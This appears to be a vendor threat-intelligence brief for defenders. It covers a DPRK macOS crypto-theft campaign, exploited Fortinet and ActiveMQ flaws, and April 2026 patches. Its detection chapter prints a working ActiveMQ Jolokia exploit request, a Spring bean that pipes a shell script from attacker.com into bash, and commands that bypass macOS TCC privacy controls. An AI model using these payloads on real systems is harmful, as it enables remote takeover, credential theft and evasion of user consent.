Inferlume

How it Works

Reports

Pricing

About

Get Free Access →

Get Free Access

Last Updated On

Friday, April 17, 2026

DDAAIILLYY--22002266--00441177

CCrriittiiccaall

AAccttiivvee EExxppllooiittaattiioonn CCoonnffiirrmmeedd

Perimeters on Fire: DPRK Hits macOS Wallets, Fortinet Burns, and Microsoft Ships Its Heaviest Patch Tuesday of 2026

North Korean state actor Sapphire Sleet is running a live macOS campaign stealing cryptocurrency and credentials from finance and tech professionals. Simultaneously, CISA confirmed active exploitation of Apache ActiveMQ (CVE-2026-34197) and Fortinet management infrastructure, while Microsoft's April 2026 Patch Tuesday shipped 167 fixes including two actively exploited zero-days. Immediate action required across all five clusters.

9.8

CVSS Score

IOC Count

Source Count

Confidence Score

CVEs

Actors

Sectors

Regions

Chapter 01 - Executive Overview

Today's brief covers five concurrent threat clusters that together represent the most concentrated single-day risk event of April 2026. Three require immediate action before the weekend. Two require accelerated patching this week. One — Sapphire Sleet — has already stolen cryptocurrency from targets and offers no recovery path once assets are gone.

Cluster A — Sapphire Sleet macOS Campaign

Severity: Critical | Sectors: Crypto, VC, Finance, Tech | Attribution: High

A North Korean state actor — Sapphire Sleet — is actively running a macOS campaign targeting cryptocurrency holders, venture capital professionals, blockchain developers, and finance employees. The attack begins with a fake recruiter on LinkedIn, ends with a 575-line AppleScript exfiltrating nine categories of sensitive data including cryptocurrency wallet keys, Telegram sessions, browser credentials, SSH keys, and Apple Notes — and does so without exploiting a single software vulnerability.

The actor exploits human trust, not software flaws. A fabricated job interview requires the target to install a "Zoom SDK Update" — which is actually a malicious script file. Once opened, the attack is fully automated. macOS security controls (Gatekeeper, TCC, notarization) are bypassed because the script runs inside Apple's own Script Editor application. There is no prompt. There is no warning. The attack completes silently.

What makes this irreversible: Stolen cryptocurrency private keys and wallet seeds cannot be invalidated or recovered. Unlike a password breach, there is no "change credentials" option. Once wallet keys are exfiltrated, associated funds are at permanent risk.

What leadership must decide today: Any organization whose employees hold cryptocurrency, access DeFi platforms, manage client crypto assets, or work in blockchain/VC must immediately verify that macOS endpoint protection is deployed, current, and actively detecting. This is not a wait-and-patch situation. The campaign is live. Microsoft has published IOCs. Apple has deployed protections. Your endpoint must be updated to benefit.

Cluster B — Fortinet FortiCloud SSO & FortiClient EMS

Severity: Critical | Sectors: Enterprise, MSPs, Government | Attribution: Unattributed

Since January 2026, unknown attackers have exploited a critical authentication bypass in Fortinet's FortiCloud SSO service (CVE-2026-24858) to log into customer firewalls without valid credentials, create rogue administrator accounts, and modify network security configurations — even on devices running fully patched firmware at the time. Fortinet temporarily shut down FortiCloud SSO globally on January 26 to contain exploitation.

Separately, CISA's KEV catalog confirms that Fortinet FortiClient EMS — the platform many organizations use to manage endpoint security policies — carries a CVSS 9.1 SQL injection vulnerability (CVE-2026-21643) under active exploitation. The FCEB patch deadline was April 16, 2026 — yesterday.

What leadership must decide today: Any environment using FortiCloud SSO that has not upgraded to fixed firmware must disable FortiCloud SSO immediately and audit administrative accounts for unauthorized additions. Any environment running FortiClient EMS must confirm patching status and restrict external access to the management interface.

Cluster C — Apache ActiveMQ CVE-2026-34197

Severity: Critical | Sectors: Enterprise, Finance, Healthcare, Government | Attribution: Unattributed

CISA added CVE-2026-34197 to the Known Exploited Vulnerabilities catalog today (April 17, 2026). Apache ActiveMQ — a foundational enterprise messaging broker used in data pipelines, integration middleware, and ESB architectures — has a remote code execution vulnerability that attackers are actively exploiting. The flaw has existed in the codebase for over 13 years.

In many real-world deployments, the default admin:admin credential is never changed, making this vulnerability functionally unauthenticated. An attacker can send a crafted request to the Jolokia JMX management API and execute arbitrary operating system commands on the broker's host. From a compromised broker, attackers can access connected data pipelines, backend databases, and internal systems. FCEB patch deadline: April 30, 2026.

What leadership must decide today: Security teams must identify all ActiveMQ instances in the environment, block external access to Jolokia endpoints at the perimeter, audit for default credentials, and begin upgrade to 5.19.4 or 6.2.3 within 24 hours.

Cluster D — Microsoft April 2026 Patch Tuesday (167 Vulnerabilities)

Severity: Critical/High | Sectors: All enterprise | Attribution: Partial

Microsoft's largest Patch Tuesday of 2026 addresses 167 vulnerabilities. Four require immediate attention:

CVE-2026-32201 (SharePoint Server) — actively exploited zero-day. Spoofing via improper input validation. CISA KEV confirmed.
CVE-2026-33824 (Windows IKE, CVSS 9.8) — unauthenticated remote code execution. Potentially wormable across IPSec-enabled networks. No user interaction required.
CVE-2026-33825 (Microsoft Defender EoP) — actively exploited zero-day. Post-initial-access privilege escalation to SYSTEM.
CVE-2023-21529 (Exchange Server) — KEV-listed. Weaponized by Storm-1175 (China-nexus) to deliver Medusa ransomware. FCEB deadline: April 27, 2026.

What leadership must decide today: Approve emergency patching windows for SharePoint, Windows IKE, and Defender this weekend. CVE-2026-33824 is CVSS 9.8 and potentially wormable — in environments where patching is delayed, firewall rules blocking external IKEv2 must be applied immediately.

Cluster E — Google Chrome Skia & V8 Zero-Days

Severity: High | Sectors: All (universal browser surface) | Attribution: Unattributed

CISA has added CVE-2026-3909 (Chrome Skia — out-of-bounds write) and CVE-2026-3910 (Chrome V8 — memory corruption) to KEV following Google's confirmation of active in-the-wild exploitation. Both carry CVSS 8.8. Exploitation requires only that a user visits a malicious webpage. Combined with social engineering — a tactic Sapphire Sleet uses extensively — browser exploitation is a reliable initial access vector on any unpatched endpoint.

What leadership must decide today: Push Chrome/Chromium updates to all managed endpoints immediately. Enforce browser restart policies so the update takes effect.

Chapter 02 - Threat & Exposure Analysis

Cluster A — Sapphire Sleet macOS: Full Attack Chain

Actor Identity Sapphire Sleet is a North Korean state-sponsored group, tracked as UNC1069 by Google Mandiant/GTIG, Alluring Pisces by Unit 42/SentinelOne, and BlueNoroff by Kaspersky (supplemental only⚠). Microsoft Threat Intelligence (T1-03) is the primary attribution source for this campaign. The group has been active since at least March 2020 and is assessed as a DPRK revenue-generation operation — cryptocurrency theft funds regime activities. Google GTIG corroborates the same actor cluster via the March 31, 2026 npm supply chain incident (package live for ~3 hours before removal; observed timestamp: 2026-03-31T00:21Z).

Lure & Initial Access (T1566, T1204.002) The actor creates fake recruiter personas on LinkedIn and professional networking platforms. Targets — primarily cryptocurrency professionals, VC employees, blockchain developers, and tech sector workers — receive job offers. The "technical interview" requires installation of a Zoom SDK Update. The delivered file is a compiled AppleScript (.scpt) named Zoom SDK Update.scpt.

When a target opens this file in macOS Script Editor (a trusted, Apple-signed application), execution begins. Because it originates from a user-initiated, Apple-signed context, macOS Gatekeeper and notarization controls do not trigger. The quarantine attribute is present — but Script Editor's trusted status means the operating system proceeds.

Execution Chain: Five-Stage AppleScript Cascade (T1059.002) After thousands of blank lines and a decoy Zoom documentation comment block:

Stage 0 (Lure file): Calls /usr/sbin/softwareupdate with invalid parameters as a visual decoy — a real Apple binary running in the foreground to reassure the target. Simultaneously launches curl to fetch Stage 1 from C2.
Stage 1 (mac-cur1): Fetched AppleScript piped directly to osascript via run script result — no disk write. Deploys com.apple.cli (host monitor, C2 registration) and services binary (primary backdoor + persistence installer).
Stage 2 (mac-cur2): Deploys credential-harvesting component via mac-cur4 (systemupdate.app download).
Stage 3 (mac-cur3): Executes TCC bypass, full data collection, and 575-line exfiltration AppleScript.
Stage 4 (mac-cur4): Downloads and installs systemupdate.app ZIP.
Stage 5 (mac-cur5): Downloads decoy softwareupdate.app to present a completion dialog and close the social engineering loop.

Each stage uses a distinct curl user-agent for campaign tracking: mac-cur1, mac-cur2, mac-cur3, mac-cur4, mac-cur5, audio, beacon.

TCC Bypass — Defense Evasion (T1562.001) macOS's Transparency, Consent, and Control (TCC) framework protects sensitive resources. The actor's bypass abuses the fact that Finder holds Full Disk Access (FDA) by default:

Finder is used to rename the com.apple.TCC directory (Finder's FDA permits this without a user prompt).
The attacker copies TCC.db to a staging location.
sqlite3 modifies the copy: a new entry grants /usr/bin/osascript AppleEvents permission to com.apple.finder (auth_value=2, auth_reason=3 — no user consent dialog triggered).
The modified database replaces the original. Staging files are deleted.

Result: osascript can now control Finder and access any protected resource without triggering user consent prompts.

Credential Harvesting (T1056.002) systemupdate.app presents a pixel-perfect fake macOS password dialog. The captured password is validated via dscl -authonly before exfiltration — only valid credentials are sent. Validated credentials are transmitted immediately to the Telegram Bot API (api.telegram.org/bot*) on port 443, blending into legitimate HTTPS traffic.

Data Exfiltration — Nine Categories (T1539, T1555.001, T1041) The 575-line AppleScript (mac-cur3) stages and uploads nine zip archives:

Archive Pattern	Contents
`tapp_*.zip`	Telegram session data
`ext_*.zip`	Browser profiles, credentials, cookies (Chrome, Brave, Arc)
`ldg_*.zip`	Ledger hardware wallet data
`exds_*.zip`	Exodus wallet
`hs_*.zip`	SSH keys, shell history
`nt_*.zip`	Apple Notes database
Crypto extensions	Sui, Phantom, TronLink, Coinbase, OKX, Solflare, Rabby, Backpack, Bitwarden
Keychain	macOS Keychain database
System logs	Diagnostic logs

All archives upload to C2 on port 8443 using a published upload authorization token (fwyan48umt1vimwqcqvhdd9u72a7qysi — published by Microsoft, do not use as an operational IOC; treat as campaign artifact for detection reference).

Persistence — LaunchDaemon (T1547.011) com.google.webkit.service.plist is installed under /Library/LaunchDaemons/ — system-level, survives reboots, runs before user login. It launches icloudz — the primary backdoor — disguised as a legitimate Google service.

Reflective Loading — In-Memory Mach-O (T1055) icloudz uses Apple's NSCreateObjectFileImageFromMemory API to load Mach-O payloads directly from C2 into memory. No file is written to disk. This defeats file-based detection and forensic artifact recovery.

Tertiary Backdoor (T1041) com.google.chromes.updaters — a third backdoor installed to ~/Library/Google/ — runs a 60-second beacon loop connecting to check02id[.]com on port 5202. It operates independently of the primary C2 cluster, providing infrastructure redundancy.

Cluster B — Fortinet: Management Plane Takeover

CVE-2026-24858 — FortiCloud SSO Authentication Bypass Fortinet's FortiCloud SSO service, used for administrative login to FortiOS, FortiManager, and FortiAnalyzer devices, contained an alternate authentication path (CWE-288) that failed to properly isolate tenant context. Attackers with any FortiCloud account and a registered device could authenticate to other customers' devices. The exploit created local administrator accounts directly on FortiGate firewalls — even on devices with prior SSO vulnerabilities (CVE-2025-59718/59719) already patched.

Shadowserver telemetry confirms externally exposed FortiCloud SSO instances dropped from over 26,000 in late December 2025 to fewer than 10,000 by late January 2026 — reflecting Fortinet's global SSO disable on January 26. Approximately 10,000 instances remain potentially exposed where patching is incomplete.

CVE-2026-21643 & CVE-2026-35616 — FortiClient EMS RCE FortiClient EMS — the centralized endpoint policy management platform — accepts crafted HTTP requests from unauthenticated attackers. CVE-2026-21643 is SQL injection (CVSS 9.1) enabling arbitrary command execution. CVE-2026-35616 is improper access control enabling unauthenticated code execution. Both are CISA KEV-listed. FCEB deadline for CVE-2026-21643: April 16, 2026 — already past.

Strategic Risk: A compromised FortiClient EMS server gives an attacker control over endpoint security policies across the entire managed fleet. Combined with FortiCloud SSO takeover of firewalls, a single threat actor can simultaneously disable endpoint protection and modify network security rules — a complete security architecture bypass.

Cluster C — Apache ActiveMQ CVE-2026-34197: Jolokia JMX-HTTP RCE

ActiveMQ's Jolokia JMX-HTTP bridge, exposed by default at /api/jolokia/ on the web console, provides a REST-to-JMX interface. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector() and BrokerService.addConnector().

An attacker supplies a crafted discovery URI to these methods. The URI's brokerConfig parameter directs the VM transport to load a remote Spring XML application context via ResourceXmlApplicationContext. Spring instantiates all declared singleton beans before ActiveMQ validation runs — creating an injection window during which bean factory methods (e.g., Runtime.exec()) execute arbitrary OS commands as the ActiveMQ service account.

Default Credential Amplification: The majority of production ActiveMQ deployments use default admin:admin credentials, making this functionally unauthenticated in real-world environments. On versions 6.0.0–6.1.1, a chained flaw (CVE-2024-32114) makes this explicitly unauthenticated.

Attack surface: Any enterprise running ActiveMQ with an externally accessible Jolokia endpoint — regardless of whether the console is "internal" — is directly exposed. ActiveMQ is embedded in many enterprise integration frameworks and may not appear in standard asset inventories.

Cluster D — Microsoft Patch Tuesday: Critical Subset

CVE-2026-33824 (Windows IKE, CVSS 9.8): Unauthenticated RCE via crafted IKEv2 packets. No user interaction required. Microsoft and ZDI describe the exploitation path as potentially wormable across IPSec-enabled networks — meaning a single compromised host could propagate exploitation to adjacent systems without any additional user action.

CVE-2026-32201 (SharePoint, CVSS 6.5): Improper input validation enables network-based spoofing. Microsoft confirms active exploitation ("Exploitation Detected"). Specific exploitation chain is not publicly disclosed; impact includes unauthorized information access and potential data modification in SharePoint-hosted content.

CVE-2026-33825 (Defender EoP, CVSS 7.8): Zero-day, actively exploited. Post-initial-access privilege escalation to SYSTEM. Remediated by Defender Antimalware Platform update v4.18.26050.3011, auto-distributed to environments with automatic updates enabled.

CVE-2023-21529 (Exchange Server RCE — KEV): Microsoft attributes weaponization of this flaw to Storm-1175 (China-nexus, financially motivated) for delivery of Medusa ransomware. FCEB deadline: April 27, 2026.

Cluster E — Chrome Skia/V8 (CVE-2026-3909, CVE-2026-3910)

CVE-2026-3909 (Skia, CVSS 8.8): Out-of-bounds write via crafted HTML rendering, enabling memory corruption and arbitrary code execution within the browser renderer process. CVE-2026-3910 (V8, CVSS 8.8): Memory corruption via malicious JavaScript/WebAssembly. Google confirmed active exploitation at patch release (March 12–13, 2026). Attack requires only that a user visits a malicious webpage — no download, no prompt, no extension required.

Cross-Cluster Pattern: Two Themes Dominating April 2026

Theme 1 — Management plane as kill chain entry: Fortinet EMS manages endpoint security. FortiCloud SSO controls firewall administration. ActiveMQ brokers enterprise data pipelines. All three are management-layer components. Compromising any one of them provides disproportionate lateral movement capability. Attackers in April 2026 are consistently targeting systems that control other security systems — a deliberate architectural targeting pattern.

Theme 2 — Social engineering replaces zero-days: Sapphire Sleet's macOS campaign deliberately avoids software exploitation. By staying within user-initiated, Apple-signed application contexts, the actor bypasses all technical security controls and makes the attack's success entirely dependent on human behavior. This is not a coincidence — zero-days carry operational cost and burn rate. Reliable social engineering is cheaper and more scalable. This trend will continue.

Chapter 03 - Operational Response

PRIORITY ORDER — TODAY

Priority	Cluster	Action	Deadline
1	Sapphire Sleet macOS	Hunt IOCs, verify macOS EDR, alert crypto/finance staff	Immediate
2	Fortinet FortiCloud SSO (CVE-2026-24858)	Disable SSO on unpatched devices, audit admin accounts	Immediate
3	Fortinet FortiClient EMS (CVE-2026-21643)	Block external access, patch — FCEB deadline was yesterday	Immediate
4	Apache ActiveMQ CVE-2026-34197	Block Jolokia externally, change default creds, patch	Within 24h
5	SharePoint CVE-2026-32201	Apply April 2026 patches, restrict admin interfaces	Within 24h
6	Windows IKE CVE-2026-33824	Patch or apply firewall mitigation immediately	Within 24h
7	Defender EoP CVE-2026-33825	Confirm Defender auto-update; apply platform update	Within 24h
8	Chrome CVE-2026-3909/3910	Push browser update across managed fleet	Within 24h
9	Exchange CVE-2023-21529	Patch — FCEB deadline April 27, 2026	This week

Cluster A — Sapphire Sleet macOS Response

DO NOW:

Verify Microsoft Defender for Endpoint on Mac (or equivalent EDR) is deployed, active, and updated on all macOS endpoints in crypto, finance, VC, and technology environments. Apple has deployed XProtect signatures — macOS must be current to receive them.
Run the following threat hunt queries against last 30 days of macOS endpoint telemetry (see Chapter 4 for full KQL/SIGMA):
- curl user-agents: mac-cur1 through mac-cur5, audio, beacon
- File paths: ~/.zoom.log, ~/Library/Application Support/iCloud/icloudz, ~/Library/Google/com.google.chromes.updaters, /Library/LaunchDaemons/com.google.webkit.service.plist
- Network connections to: *.webzoom[.]us, check02id[.]com, 83.136.208.0/22, 188.227.196.252
Alert employees in crypto, finance, developer, and VC roles: Warn explicitly about fake recruiter approaches delivering Zoom "SDK updates." Provide the exact lure pattern (.scpt files opened in Script Editor).

WITHIN 24 HOURS:

Query email and collaboration logs for outbound connections to api.telegram.org/bot* from macOS endpoints.
Block *.webzoom.us and check02id.com at DNS and perimeter firewall.
Block outbound port 5202 from workstations at the firewall level.
Apply MDM policy restricting execution of .scpt files downloaded from the internet (quarantine attribute present).

IF INCIDENT CONFIRMED:

Preserve ~/Library/ directory, LaunchDaemon plists, and any .scpt files before any remediation — do not wipe before imaging.
Escalate immediately: assume cryptocurrency assets and all stored credentials on the affected device are compromised.
Notify affected user's financial accounts, crypto exchange accounts, and Telegram contacts.

Cluster B — Fortinet Response

DO NOW:

Identify all Fortinet FortiOS, FortiManager, FortiAnalyzer devices with FortiCloud SSO enabled. For any not running fixed firmware (FortiOS 7.4.11 or vendor-specified patched branch): disable FortiCloud SSO immediately.
Identify all FortiClient EMS instances. Block external network access to EMS management interfaces if not already restricted to VPN/management network only.
Audit all Fortinet administrative accounts created since January 20, 2026. Any account not recognized should be treated as attacker-created.

WITHIN 24 HOURS:

Apply Fortinet patches for CVE-2026-24858, CVE-2026-21643, and CVE-2026-35616 across all affected deployments.
Enable and centralize Fortinet admin event logging (auth, config change, SSO session logs) if not already forwarded to SIEM.
Review configuration changes made via SSO sessions since January 2026 — specifically firewall rules, routing tables, and administrative policies.

IF INCIDENT CONFIRMED:

Preserve Fortinet event and config logs before any changes.
Treat any modified firewall ruleset as potentially attacker-controlled.
Notify SOC, IR, and customer-facing teams if managed service environments are affected. MSPs: notify impacted customers immediately.

Cluster C — Apache ActiveMQ Response

DO NOW:

Enumerate all Apache ActiveMQ instances in the environment — including those embedded in middleware, ESB, and integration frameworks that may not appear in standard CMDB entries.
Identify any Jolokia endpoints (/api/jolokia/) accessible from external networks or untrusted internal segments. Block immediately at WAF and perimeter firewall.
Audit all ActiveMQ instances for default credentials (admin:admin). Change all instances of default credentials immediately.

WITHIN 24 HOURS:

Upgrade to Apache ActiveMQ 5.19.4 or 6.2.3.
For versions 6.0.0–6.1.1: treat as P0 (unauthenticated exploitation via CVE-2024-32114 chain) — isolate from network if patching is delayed.
Disable Jolokia entirely where not operationally required. If required, restrict via jolokia-access.xml to trusted management IPs only.
Enable ActiveMQ audit logging to capture JMX/Jolokia API calls.

IF EXPLOITATION SUSPECTED:

Preserve ActiveMQ logs (/data/activemq.log) before changes.
Check for unexpected Java child process creation (e.g., sh, bash, cmd, powershell) spawned by the ActiveMQ service account.
Isolate the broker from connected data pipeline systems pending forensic review.

Cluster D — Microsoft Patch Tuesday Response

DO NOW:

Patch CVE-2026-32201 (SharePoint) — actively exploited zero-day. Prioritize internet-facing SharePoint instances.
Confirm Defender Antimalware Platform version is at minimum 4.18.26050.3011 to address CVE-2026-33825 (actively exploited EoP zero-day).
Apply emergency firewall mitigations for CVE-2026-33824 (Windows IKE, CVSS 9.8) on all VPN gateways and IPSec-enabled systems where patching cannot be completed today — block IKEv2 from untrusted external sources.

WITHIN 24 HOURS:

Patch CVE-2026-33824 and CVE-2026-33827 across all Windows Server and VPN gateway infrastructure.
Patch CVE-2026-33826 (Active Directory RCE) — lower immediate risk (requires adjacent network access) but High priority given AD's centrality.
Patch CVE-2023-21529 (Exchange Server) — KEV-listed, ransomware delivery confirmed, FCEB deadline April 27.

Cluster E — Chrome Response

DO NOW:

Push Chrome/Chromium update to all managed endpoints via MDM/policy.
Enforce browser restart policies — the update has no effect until applied.
Prioritize privileged user workstations (admins, finance, HR, executive assistants) — these are highest-value targets for browser-based initial access.

SAPPHIRE SLEET macOS CAMPAIGN
══════════════════════════════════════════════════════════════════════
2020-03-00        Sapphire Sleet (UNC1069) first observed as active DPRK
                  state threat actor — Microsoft Threat Intelligence (T1-03)
[DATE UNKNOWN]    macOS Zoom SDK Update.scpt campaign begins
                  Exact campaign start not in available sources
2026-03-31T00:21Z Malicious npm package attributed to UNC1069 observed
                  in supply chain attack — Google GTIG (T1-06)
2026-03-31T03:20Z Malicious npm package removed from npm registry
                  (~3 hour window of exposure)
2026-04-15/16     Microsoft Threat Intelligence publishes full technical
                  disclosure: IOCs, attack chain, KQL queries, MITRE
                  mappings — Microsoft Security Blog (T1-03)
2026-04-16        Apple deploys XProtect signatures and Safari Safe Browsing
                  protections for Sapphire Sleet infrastructure and malware
2026-04-16        Dark Reading (T2-11) publishes public coverage
2026-04-17        Included in this report (window close: 3 PM IST)

FORTINET FORTICLOUD SSO (CVE-2026-24858)
══════════════════════════════════════════════════════════════════════
2025-12-00        >26,000 Fortinet instances exposing FortiCloud SSO
                  externally — Shadowserver telemetry via The Record (T2-09)
2026-01-20        First confirmed reports: unauthorized FortiGate access
                  and rogue admin account creation on patched firmware
                  — Fortinet PSIRT / Help Net Security
2026-01-22        Fortinet disables malicious FortiCloud accounts actively
                  abusing CVE-2026-24858
2026-01-26        Fortinet globally disables FortiCloud SSO at service level
                  to block further exploitation while patches are developed
2026-01-27        FortiCloud SSO restored — restricted to patched firmware
                  only; Fortinet PSIRT formally publishes CVE-2026-24858
                  advisory with affected versions and remediation guidance
2026-01-28/29     Third-party telemetry (Shadowserver, SOC Prime) reports
                  sharp decline in exposed FortiCloud SSO instances;
                  log review urgency communicated broadly
2026-04-17        ~10,000 Fortinet instances still potentially exposed
                  (Shadowserver); included in this report

FORTINET FORTICLIENT EMS (CVE-2026-21643 / CVE-2026-35616)
══════════════════════════════════════════════════════════════════════
2026-03-24        CISA KEV lists CVE-2026-21643 (CVSS 9.1, SQL injection)
                  and CVE-2026-35616 (improper access control)
                  Exploitation confirmed in the wild; FCEB deadline set
2026-04-13        Secondary reporting confirms exploitation attempts ongoing
                  against FortiClient EMS since late March 2026
2026-04-16        FCEB remediation deadline for CVE-2026-21643 — PASSED
2026-04-17        Included in this report

APACHE ACTIVEMQ CVE-2026-34197
══════════════════════════════════════════════════════════════════════
~2013             Jolokia JMX-HTTP bridge vulnerability present in
                  ActiveMQ codebase — Horizon3.ai: "hiding in plain sight
                  for over 13 years"
2026-04-06        CVE-2026-34197 publicly disclosed; NVD entry published
                  CVSS 8.8 assigned; Horizon3.ai technical writeup published
2026-04-06        Fortiguard Labs IPS signature published for CVE-2026-34197
2026-04-13        SAFE Security reports threat actors actively scanning for
                  and exploiting exposed Jolokia endpoints on ActiveMQ
                  Classic deployments in the wild
2026-04-17        CISA adds CVE-2026-34197 to KEV catalog
                  FCEB patch deadline: April 30, 2026
2026-04-17        The Hacker News (T2-03) publishes KEV listing coverage
                  Included in this report

MICROSOFT APRIL 2026 PATCH TUESDAY + KEV WAVE
══════════════════════════════════════════════════════════════════════
[DATE UNKNOWN]    Storm-1175 (China-nexus) begins exploiting
                  CVE-2023-21529 (Exchange Server RCE) to deliver
                  Medusa ransomware — Microsoft Threat Intelligence (T1-03)
2026-03-24        Defused Cyber detects exploitation attempts against
                  CVE-2026-21643 (FortiClient EMS) — earliest EMS
                  exploitation timestamp in available sources
2026-04-08/13     Microsoft releases April 2026 Patch Tuesday
                  167 vulnerabilities addressed; 8 Critical, 154 Important
                  Actively exploited zero-days: CVE-2026-32201 (SharePoint),
                  CVE-2026-33825 (Defender EoP)
                  Notable critical: CVE-2026-33824 (Windows IKE, CVSS 9.8),
                  CVE-2026-33827 (Windows TCP/IP, CVSS 8.1),
                  CVE-2026-33826 (Active Directory RCE)
2026-04-13        CISA adds 6 CVEs to KEV catalog:
                  CVE-2026-21643 (Fortinet EMS) — deadline 16 Apr
                  CVE-2023-21529 (Exchange) — deadline 27 Apr
                  CVE-2026-32201 (SharePoint) — deadline 27 Apr
                  CVE-2026-35616 (Fortinet EMS) — deadline 27 Apr
                  CVE-2020-9715 — deadline 27 Apr
                  CVE-2012-1854 — deadline 27 Apr
2026-04-14        ZDI publishes April 2026 Security Update Review (T1-19)
2026-04-14        Microsoft Security (@MsftSecIntel) confirms update
                  availability via X/Twitter
2026-04-14/15     Windows Server 2025 KB5082063 causes update installation
                  failures and BitLocker recovery prompts on some systems;
                  Microsoft publishes mitigation guidance — BleepingComputer
2026-04-15        CCB Belgium advisory published covering Patch Tuesday
                  for EU enterprise context
2026-04-16        Cybersecurity Help Week in Review covers Patch Tuesday
                  and KEV additions
2026-04-17        CISA adds CVE-2026-34197 (Apache ActiveMQ) — total KEV
                  additions in current wave: 7
                  Included in this report

GOOGLE CHROME CVE-2026-3909 / CVE-2026-3910
══════════════════════════════════════════════════════════════════════
2026-03-10        Google internally identifies Chrome Skia (CVE-2026-3909)
                  and V8 (CVE-2026-3910) vulnerabilities
2026-03-12/13     Google releases patches; confirms active in-the-wild
                  exploitation for both CVEs
                  CISA adds CVE-2026-3909 and CVE-2026-3910 to KEV
                  with mandatory remediation deadlines for FCEB
2026-04-17        Included in this report as active background risk

Chapter 04 - Detection Intelligence

CVE-2026-34197 — Apache ActiveMQ Jolokia JMX-HTTP RCE

Root cause: CWE-20 (Improper Input Validation) + CWE-94 (Code Injection) Affected: activemq-broker / activemq-all < 5.19.4; versions 6.0.0–6.2.3 (excl. 6.2.3) Fixed in: 5.19.4 and 6.2.3 CVSS v3.1: 8.8 — Network / Low Complexity / No User Interaction / Authentication: Low CISA KEV: Listed 2026-04-17 | FCEB deadline: 2026-04-30

The Jolokia JMX-HTTP bridge at /api/jolokia/ exposes exec operations on all ActiveMQ MBeans by default, including BrokerService.addNetworkConnector() and BrokerService.addConnector(). An attacker supplies a crafted discovery URI containing a brokerConfig parameter that directs the VM transport to load a remote Spring XML application context via ResourceXmlApplicationContext. Spring instantiates all declared singleton beans before ActiveMQ validation runs — creating a code injection window.

Proof-of-concept request structure (Horizon3.ai, contextual):

POST /api/jolokia/ HTTP/1.1
Host: target-activemq:8161
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/json

{
  "type": "exec",
  "mbean": "org.apache.activemq:brokerName=localhost,type=Broker",
  "operation": "addNetworkConnector(java.lang.String)",
  "arguments": [
    "static:(failover:(vm://localhost))?brokerConfig=xbean:http://attacker.com/rce.xml"
  ]
}

Malicious Spring bean (attacker-hosted rce.xml):

<bean id="pwn" class="java.lang.ProcessBuilder" init-method="start">
  <constructor-arg>
    <list>
      <value>bash</value><value>-c</value>
      <value>curl http://attacker.com/shell.sh|bash</value>
    </list>
  </constructor-arg>
</bean>

Unauthenticated chained path (versions 6.0.0–6.1.1): CVE-2024-32114 in these versions exposes the Jolokia API without authentication, making CVE-2026-34197 effectively unauthenticated RCE. Treat any deployment in versions 6.0.0–6.1.1 as P0 — isolate from network if same-day patching is not possible.

Default credential amplification: admin:admin is the default ActiveMQ credential and is widely unchanged in production — practically reducing authentication requirement to zero in a large proportion of real-world deployments.

CVE-2026-24858 — Fortinet FortiCloud SSO: Tenant Isolation Failure

Root cause: CWE-288 — Authentication Bypass Using an Alternate Path Affected: FortiOS (all versions with FortiCloud SSO enabled prior to 7.4.11) Fixed in: FortiOS 7.4.11 and branch-specific patched versions per Fortinet PSIRT

Attack flow:

Attacker registers a FortiCloud account (free, publicly available)
Attacker registers any Fortinet device (including lab unit) to the account
Attacker uses the SSO authentication path — tenant isolation logic fails to scope the auth context to the attacker's registered devices only
Attacker authenticates to victim's FortiGate / FortiManager / FortiAnalyzer
Attacker creates local admin accounts and modifies network security configurations — firewall rules, routing tables, VPN policies

Post-exploitation observed (Fortinet PSIRT):

Unauthorized local admin accounts created (survive firmware updates)
Configuration export (policies, routes, VPN settings)
Potential long-term persistence via rogue accounts

CVE-2026-21643 / CVE-2026-35616 — FortiClient EMS RCE

CVE-2026-21643 (CVSS 9.1): SQL injection in FortiClient EMS web interface. Unauthenticated attacker sends crafted HTTP request — SQL injection grants code/command execution as the EMS service account.

CVE-2026-35616: Improper access control flaw in FortiClient EMS. Bypasses authentication requirement for protected management functions, enabling unauthenticated code execution.

Strategic risk: FortiClient EMS manages endpoint security policies across the entire managed device fleet. A compromised EMS server gives an attacker the ability to modify security policies, whitelist processes, disable protection modules, and extract configuration for all managed endpoints — a security architecture bypass from a single initial access point.

Sapphire Sleet macOS — Payload Chain (Source: Microsoft T1-03)

Lure delivery: Compiled AppleScript .scpt file named Zoom SDK Update.scpt. Opened in macOS Script Editor (Apple-signed, trusted — Gatekeeper does not block execution). Thousands of blank lines and a fake Zoom documentation comment block precede the malicious logic.

Execution cascade:

User opens .scpt in Script Editor
    └─► softwareupdate (decoy — Apple binary, visible in UI)
    └─► curl → attacker C2 (mac-cur1 UA) → fetch Stage 1 AppleScript
         └─► osascript "run script result" [no disk write — Stage 1 executes in memory]
              ├─► mac-cur1: deploy com.apple.cli + services binary
              ├─► mac-cur2: deploy systemupdate.app via mac-cur4
              ├─► mac-cur3: TCC bypass + data collection + 575-line exfil script
              ├─► mac-cur4: download systemupdate.app ZIP
              └─► mac-cur5: download softwareupdate.app (social engineering decoy)

TCC Bypass mechanism (mac-cur3):

# Step 1: Use Finder (FDA holder) to rename TCC directory
osascript -e 'tell app "Finder" to move folder "com.apple.TCC" \
  of (path to library folder from user domain) to trash'

# Step 2: Stage TCC.db for modification
cp ~/Library/Application\ Support/com.apple.TCC/TCC.db /tmp/.t.db

# Step 3: Grant osascript AppleEvents permission — no user prompt
sqlite3 /tmp/.t.db \
  "INSERT OR REPLACE INTO access VALUES \
  ('kTCCServiceAppleEvents','/usr/bin/osascript',1,2,3,1, \
  'com.apple.finder',NULL,NULL,'UNUSED',NULL,0,1337);"

# Step 4: Restore modified database
cp /tmp/.t.db ~/Library/Application\ Support/com.apple.TCC/TCC.db
rm

Exfiltration — Nine data categories staged as ZIP archives (port 8443):

Archive Pattern	Contents
`tapp_*.zip`	Telegram session data
`ext_*.zip`	Browser profiles, cookies, credentials (Chrome, Brave, Arc)
`ldg_*.zip`	Ledger hardware wallet data
`exds_*.zip`	Exodus wallet
`hs_*.zip`	SSH keys + shell history
`nt_*.zip`	Apple Notes database
Keychain	macOS Keychain database
Crypto extensions	Sui, Phantom, TronLink, Coinbase, OKX, Solflare, Rabby, Backpack, Bitwarden
System logs	Diagnostic and system logs

Stolen password exfiltrated separately via Telegram Bot API on port 443.

Persistence — LaunchDaemon: /Library/LaunchDaemons/com.google.webkit.service.plist Launches icloudz backdoor at system boot — before user login, elevated privileges, survives reboots.

